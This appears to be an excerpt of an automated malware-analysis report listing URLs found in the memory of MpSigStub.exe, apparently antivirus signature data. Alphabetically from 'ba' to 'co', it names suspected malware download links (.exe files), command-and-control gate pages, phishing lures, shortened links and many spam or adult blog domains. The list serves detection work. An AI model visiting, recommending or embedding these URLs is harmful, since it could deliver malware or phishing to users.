Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://bannercpm.com/bc
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://bar-refaeli-online.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://barrefaeli-hot.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://batrasiaku.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://batysnewskz.kz/ups.com
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://bbfitblogger.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://bbtbfr.pw/GetHPHost
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://bbtbfr.pw/ads/gad1.js
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://bcoolapp.com
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://bdsmforyoungs.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://berita-mediasemasa.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://berita-tanahmelayu.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://berkah2013.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://best-search.us
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://best4hack.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1http://rezultsd.info/cd/cd.php?id=%s&ver=ig1http://carren
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://bestbsd.info/cd/cd.php?id=ERROR&ver=ig1
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://bestnyaduit.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://bestofthebesttatoo.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://bestoneoffour.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://besttechforum.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://besttoolbars.net/af_analytics
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://bestwebtips.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://beutiful-girl-fuck-moviepp.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp String found in binary or memory: http://bgtc.pctonics.com
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: http://bhngvfcdswqwertyuiopasdfghjkllkjhgfdsapo.ydns.eu/srvhost.doc
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://biancavoguel.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://big-boobs-nude.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://bigboobsp.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://bikerboyz11.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://bilakubercakap.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://bilincaltitelkincd.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://bilincaltitemizligi.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: http://billpay-center.com/post/506pblpks.exe
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: http://binnenspegel.fryslan.intern/ofdielingen/iv/ict/projecten/docbaseq32014/documenten/forms/templ
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: http://binni-ks.com/modules/dashgoals/binni.htm)
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: http://bintai.com.sg.oliverboeckel.com/zgf2ev9zdwlaymludgfplmnvbs5zzw==
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://bis.180solutions.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://bisersables.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2fy
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2h9
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2pe
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2tt
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq3ed
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqksy
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fql9f
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqlxg
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqm5f
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqmag
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqmin
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqnfa
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqrh4
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqv6g
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqv8b
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqwam
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqwdq
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqxt8
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqxx3
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqxx8
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyco
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqycs
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyh6
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyha
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyhe
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyhk
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzi9
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzim
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzmn
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzmv
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzr4
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzt3
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqztv
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://bittupadam.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://blackhole.ddnsgeek.com:8088
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://blacksun.phpnet.us/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://blackterias.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://blattodea.ru/acd53ad2/although/clamp/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://blog-ilmu10.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://blog-misteri.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://blog-rye.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: http://blog.x-row.net/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://blogcliphai.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://bloggersiput.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://bloggiaitribg.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://bloghumortododiablog.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://blogketoanthue.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://bloglistcorner.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://blogluyoruz.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://blogphimhay41.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://blogsemasacaparnab.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://bnpost.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://bonkersmen.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://bonzo.lublin.pl/help/helpNEW.exe
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://book4u-free.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://bootreading.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://bopdu.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://bosengaptek.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://boss.orda.icu/mailb.php
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://bot.cjfeeds.com
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://bousalemfoot.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://brazzerslove.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://brilhosefascinios.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: http://brokentools.xyz/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://browsetosave.info
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://bsskillthdyemmulatorsdevelovercomun6bfs.duckdns.org/document/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://bugs.clamav.net
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://bukankeranaakutakcintafull.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://busco-mujeres.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://butterchoco.net/admin/bull/gate.php
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://c2quocoaidateh.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: MpSigStub.exe, 0000000B.00000003.18320877082.0000021B5E3DA000.00000004.00000001.sdmp String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://calendar.cjishu.com/index.php
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://californianlondon.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://calleveinte.com.mx/ups-quantum-view
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://calux123.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://camaraquiterianopolis.ce.gov.br/rechnung/
Source: MpSigStub.exe, 0000000B.00000003.18265698120.0000021B5F5E8000.00000004.00000001.sdmp String found in binary or memory: http://canonicalizer.ucsuri.tcs/(%w%w
Source: MpSigStub.exe, 0000000B.00000003.18280104198.0000021B5F2F2000.00000004.00000001.sdmp String found in binary or memory: http://canonicalizer.ucsuri.tcs/3
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://captinads.com/oldtest/page.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://carnaval2008fotos.com.dish5031.net.ibizdns.com/SOURCE_H4CK3R
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://carrentalhelp.org/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://carsgirlssexy.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://casinotropez.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://catatanerwin.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://catatanfarhans.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://catell.ru/set.js
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://cc.advancedpccare.com/wcfCountryPricing/countrypricing.svc/GetCountryCode
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://ccc.avn12.cn/ccc/qqqccc/post.asp?i=77
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://ccdelsur.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ccfairy.com/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://cdn.ap.bittorrent.com/control/tags/
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://cdn.chatcdn.net
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://cdn.montiera.com/mntr/cmn/addonmsg.htmx
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://cdn.starter.fm/s/tuto4pc/ads/fr/startertv/player_tv.html?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cdn.zry97.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cdn.zry97.com/youxi
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://cdn.zry97.com/youxi/index_x
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://cdsa.xyz
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://cekirdekinanc.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://celebrity-nude-fuck.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://celebritybeefcake.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://celebs21mangap.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://chambahistory.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://chemgioaz.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://chistepordia.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://chutkiraani.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://chuyenquanaotreem.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://cicahroti.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://citw-vol2.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://cl.1ck.me/
Source: MpSigStub.exe, 0000000B.00000003.18320594233.0000021B5E399000.00000004.00000001.sdmp String found in binary or memory: http://clarityupstate.com/b.ocx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://clean.systemerrorfixer.com/MTg1MzE=/2/
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://cleanwebsearch.com/?q=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://click.p4p.cn.yahoo.com/g
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://client.aldtop.com
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://clientportal.download/123.php
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://clientportal.download/div.php
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://clients.lb1networks.com/upd.php?
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://cloud-search.linkury.com
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://clubdelaparrilla.cl/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://cnr.org.br/ups-quantum-view
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cns.3721.com/cns.dll?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cns.3721.com/cns.dll?xC
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://coastervilleregalos.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://cock4worship.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://coconut-pete.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://coltaddict.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://community.derbiz.com/
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://companieshouseonlinedownload.com/ox9.png
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://completely-free-movies.info/2/?gen
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://config.juezhao123.com/c.ashx?ver=&c=
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://connect.act-sat-bootcamp.com/dana/home.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://consumerinput.com/privacy
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://continuetosave.info/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://coolpixhost.biz/rd/provider_license_v7.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://coolpixhost.biz/rd/provider_license_v7.php?
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://coolwalpaper.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://cooperjcw.xyz/bjsdke.exe
